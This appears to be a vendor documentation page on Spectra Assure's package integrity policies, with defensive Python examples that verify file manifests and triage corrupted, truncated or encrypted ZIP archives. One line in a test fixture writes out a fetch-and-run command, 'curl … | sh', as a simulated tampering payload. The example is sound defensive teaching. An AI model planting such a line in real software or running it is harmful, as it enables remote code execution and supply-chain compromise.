Package integrity policies
Package integrity policies are a group of software quality policies used by the Spectra Assure platform to help you improve the overall security of your software packages.
These policies are used during software package analysis to check your code and inform you if any of the built-in validation rules are violated. Specifically, package integrity policies focus on detecting and reporting data integrity issues, errors, and warnings encountered by the analysis engine when unpacking files or analyzing software packages.
In the Spectra Assure SAFE report, these policy violations can be found in the Package Integrity issue category and cause risk in the SAFE Assessment Tampering category.
Release managers and software publishers will benefit the most from the guidance provided by these policies. When Spectra Assure products detect potential data integrity issues in a software package, the affected components are highlighted in the SBOM part of the analysis report. Development teams can then apply the remediation advice for each particular policy to resolve detected issues.
Security challenges and practices
Verifying and maintaining file integrity is an important practice in the context of software supply chain security. For software consumers, file integrity is a trust signal that indicates the file is exactly the same as it was when the software publisher created or updated it.
If file integrity is compromised, the best-case scenario is that it happened accidentally - that the file became corrupted because of defective storage media, unexpected software bugs, or errors during copy, move, or write operations. These types of issues can usually be resolved by recreating the file or restoring its backup copy.
A much more dangerous case is when file integrity compromise indicates that the file has been modified by untrusted parties, or points to a software tampering incident by either internal or external attackers. These types of issues require a thorough investigation, careful communication, and a strategic approach to ensure the compromise is contained to the least possible scope, ideally without affecting the software end-users at all.
File integrity checks on software packages therefore serve several purposes at once. They let software publishers and consumers confirm that a package's contents are structurally valid and complete, that the package has not been tampered with, and, when combined with code signing, that it really comes from the claimed publisher.
Software publishers can build hash-based file verification, code signing, and file integrity monitoring into their development and release processes. Not all of these methods are equally resilient, however: a checksum computed with a broken hash function such as MD5 or SHA-1 can be defeated by a collision attack that conceals malicious changes, and a checksum published on the same channel as the file it protects only proves that the two were not altered independently. Data manipulation or corruption by insiders can be harder still to detect, because insiders know the organization's processes and tools and may be able to circumvent the safeguards already in place. Compromised file integrity is therefore not only a software security concern, but a serious threat to every organization's reputation, finances, and customer relationships.
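To make the hash-based verification step concrete, here is an added example (written for this page, not code from ReversingLabs or Spectra Assure). It assumes a hypothetical manifest format of one `algorithm:hexdigest  relative/path` entry per line, verifies a directory tree against it, and reports modified, missing and unexpected files separately, because an added file is as much a tampering signal as a changed one. It also flags manifest entries that rely on MD5 or SHA-1, since a matching weak digest does not rule out a collision-based substitution. The package tree, manifest and tampering are all constructed inside `demo()`.

```python
from __future__ import annotations

import hashlib
import os
import tempfile

# Digest algorithms with practical collision attacks; a manifest that relies on
# them does not prove a file was not substituted.
WEAK_ALGORITHMS = {"md5", "sha1"}


def hash_file(path: str, algorithm: str = "sha256") -> str:
    """Stream a file through hashlib so large artifacts are not read into memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def parse_manifest(text: str) -> dict[str, tuple[str, str]]:
    """Parse the hypothetical manifest format used here:
    one 'algorithm:hexdigest  relative/path' entry per line, '#' comments allowed."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest_field, rel_path = line.split(None, 1)
        algorithm, hexdigest = digest_field.split(":", 1)
        entries[rel_path.strip()] = (algorithm.lower(), hexdigest.lower())
    return entries


def verify_tree(root: str, manifest_text: str) -> dict[str, list[str]]:
    """Check every manifest entry against the files under root, and also report
    files the manifest never mentioned: an added file is a tampering signal too."""
    expected = parse_manifest(manifest_text)
    report = {"ok": [], "modified": [], "missing": [], "unexpected": [], "weak_algorithm": []}
    present = set()
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            rel = os.path.relpath(os.path.join(dirpath, name), root).replace(os.sep, "/")
            present.add(rel)
    for rel, (algorithm, digest) in expected.items():
        if algorithm in WEAK_ALGORITHMS:
            report["weak_algorithm"].append(rel)
        if rel not in present:
            report["missing"].append(rel)
            continue
        actual = hash_file(os.path.join(root, rel), algorithm)
        report["ok" if actual == digest else "modified"].append(rel)
    report["unexpected"] = sorted(present - expected.keys())
    return report


def demo() -> dict[str, list[str]]:
    """Constructed fixture: build a tiny package tree and its manifest, then
    tamper with one file, delete another and plant an extra one."""
    files = {
        "bin/tool": b"#!/bin/sh\necho ok\n",
        "lib/helper.so": b"\x7fELF" + b"\x00" * 16,
        "LICENSE": b"MIT\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, data in files.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as f:
                f.write(data)
        # The publisher's manifest: SHA-256 for two files, a legacy MD5 line for the third.
        lines = [f"sha256:{hash_file(os.path.join(root, rel))}  {rel}"
                 for rel in ("bin/tool", "lib/helper.so")]
        lines.append(f"md5:{hash_file(os.path.join(root, 'LICENSE'), 'md5')}  LICENSE")
        manifest = "# constructed manifest\n" + "\n".join(lines) + "\n"
        # Simulated post-release changes to the tree (constructed, not a real incident).
        with open(os.path.join(root, "bin/tool"), "ab") as f:
            f.write(b"curl http://example.invalid/x | sh\n")  # appended payload
        os.remove(os.path.join(root, "lib/helper.so"))
        with open(os.path.join(root, "bin/.cache"), "wb") as f:
            f.write(b"planted\n")
        return verify_tree(root, manifest)


if __name__ == "__main__":
    for category, paths in demo().items():
        print(f"{category:15} {paths}")
```

The report deliberately keeps the five outcomes apart: a release manager reacts differently to a modified binary (possible tampering) than to a missing one (possible packaging error), and a `weak_algorithm` finding means the `ok` verdict for that entry should not be trusted on its own.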
The Spectra Assure platform can detect and report file integrity problems found while performing unpacking or validation steps during software package analysis. Those problems may be caused by incomplete or corrupted file content, password-protected content, unsupported file formats, or in rare cases, by issues with the analysis engine's file format parsing functions. For a limited set of archive file formats, Spectra Assure is able to decrypt password-protected content if the user provides correct passwords before the scan. This feature is available to all Spectra Assure CLI users, as well as to all users who work with the rl-scanner Docker image.
Policies in this category
Package integrity policies cover the following:
- Archive or software packaging formats unsupported by Spectra Assure
- Incomplete, corrupted, and partially analyzed software package content
- Failed integrity validation checks
- Password-protected software package content
- SQ25101 - Detected unsupported archive or software packaging formats.
- SQ25102 - Detected packages with content that may be incomplete or corrupted.
- SQ25103 - Detected packages with content that could only be partially analyzed.
- SQ25104 - Detected packages with content that failed integrity validation checks.
- SQ25105 - Detected packages with content protected by an unknown password.
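The detection described above and the policy list it feeds map naturally onto what an unpacker can observe while opening an archive. The following is an added example, not Spectra Assure's code and not a description of its actual unpacking logic: a toy Python unpacker that understands only ZIP and reports an unsupported container, a truncated container, members it could not decrypt, members whose stored CRC-32 no longer matches their bytes, and whether those skips left the analysis only partial. The `SQ` numbers in the comments are this example's own mapping onto the policy themes, not the platform's classification rules. All sample archives are constructed in memory; the encrypted fixture only sets the ZIP encryption flag on a member (enough to exercise the password-required path) rather than really encrypting its data.

```python
from __future__ import annotations

import io
import struct
import zipfile

ZIP_MAGIC = (b"PK\x03\x04", b"PK\x05\x06")   # local file header, or an empty archive
ENCRYPTED_FLAG = 0x0001                       # general-purpose flag bit 0 (ZIP APPNOTE 4.4.4)


def classify_package(blob: bytes, password: bytes | None = None) -> dict:
    """Triage one archive the way an unpacker would. The SQ numbers in the
    comments are this example's mapping onto the policy themes above."""
    result = {"unsupported_format": False, "corrupted": False,
              "encrypted": [], "crc_failed": [], "analyzed": [], "partial": False}
    if not blob.startswith(ZIP_MAGIC):
        result["unsupported_format"] = True      # this toy unpacker only knows ZIP (cf. SQ25101)
        return result
    try:
        zf = zipfile.ZipFile(io.BytesIO(blob))   # parses the central directory
    except zipfile.BadZipFile:
        result["corrupted"] = True               # truncated or directory missing (cf. SQ25102)
        return result
    with zf:
        if password:
            zf.setpassword(password)
        for info in zf.infolist():
            try:
                zf.read(info)                    # zipfile checks the stored CRC-32 on read
            except RuntimeError:                 # encrypted, no or wrong password (cf. SQ25105)
                result["encrypted"].append(info.filename)
            except zipfile.BadZipFile:           # CRC-32 mismatch: bytes changed in place (cf. SQ25104)
                result["crc_failed"].append(info.filename)
            else:
                result["analyzed"].append(info.filename)
    skipped = result["encrypted"] + result["crc_failed"]
    result["partial"] = bool(skipped) and bool(result["analyzed"])   # cf. SQ25103
    return result


# ---- constructed fixtures below: not real packages ----------------------------

def build_zip(members: dict[str, bytes]) -> bytes:
    """Write members uncompressed so a byte flip lands in file data, not a zlib stream."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def _member_offsets(blob: bytes, name: str) -> tuple[int, int]:
    """Return (local file header offset, central directory entry offset) of a member."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        local = zf.getinfo(name).header_offset
    encoded = name.encode()
    pos = blob.find(b"PK\x01\x02")
    while pos >= 0:
        name_len = struct.unpack_from("<H", blob, pos + 28)[0]
        if blob[pos + 46:pos + 46 + name_len] == encoded:
            return local, pos
        pos = blob.find(b"PK\x01\x02", pos + 4)
    raise KeyError(name)


def corrupt_member(blob: bytes, name: str) -> bytes:
    """Flip the first data byte of a member while leaving its recorded CRC-32 intact."""
    local, _ = _member_offsets(blob, name)
    name_len, extra_len = struct.unpack_from("<HH", blob, local + 26)
    out = bytearray(blob)
    out[local + 30 + name_len + extra_len] ^= 0xFF
    return bytes(out)


def mark_encrypted(blob: bytes, name: str) -> bytes:
    """Set the encryption flag in both headers of a member (data left as written)."""
    local, central = _member_offsets(blob, name)
    out = bytearray(blob)
    for off in (local + 6, central + 8):         # flag field offset in each header type
        flags = struct.unpack_from("<H", out, off)[0]
        struct.pack_into("<H", out, off, flags | ENCRYPTED_FLAG)
    return bytes(out)


def build_fixtures() -> dict[str, bytes]:
    clean = build_zip({"lib/app.so": b"\x7fELF" + b"\x00" * 32, "README": b"hello\n"})
    return {
        "clean": clean,
        "not_an_archive": b"ZZ\x00\x01" + b"\x00" * 60,    # made-up container format
        "truncated": clean[: len(clean) // 2],            # download cut off mid-stream
        "partly_corrupted": corrupt_member(clean, "README"),
        "encrypted": mark_encrypted(clean, "lib/app.so"),
    }


if __name__ == "__main__":
    for label, blob in build_fixtures().items():
        print(f"{label:17} {classify_package(blob)}")
```

Two details carry over to real unpackers: a container can be perfectly parseable and still hold a member whose bytes no longer match its CRC, so validation has to happen per member, not just on open; and the `partial` verdict is only meaningful when at least one member was analyzed, which is why it is derived from both lists rather than from the skip list alone.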
Recommended for you
- Software tampering (ReversingLabs glossary)
- Go below the surface on tampering: The trouble with software integrity validation (ReversingLabs blog)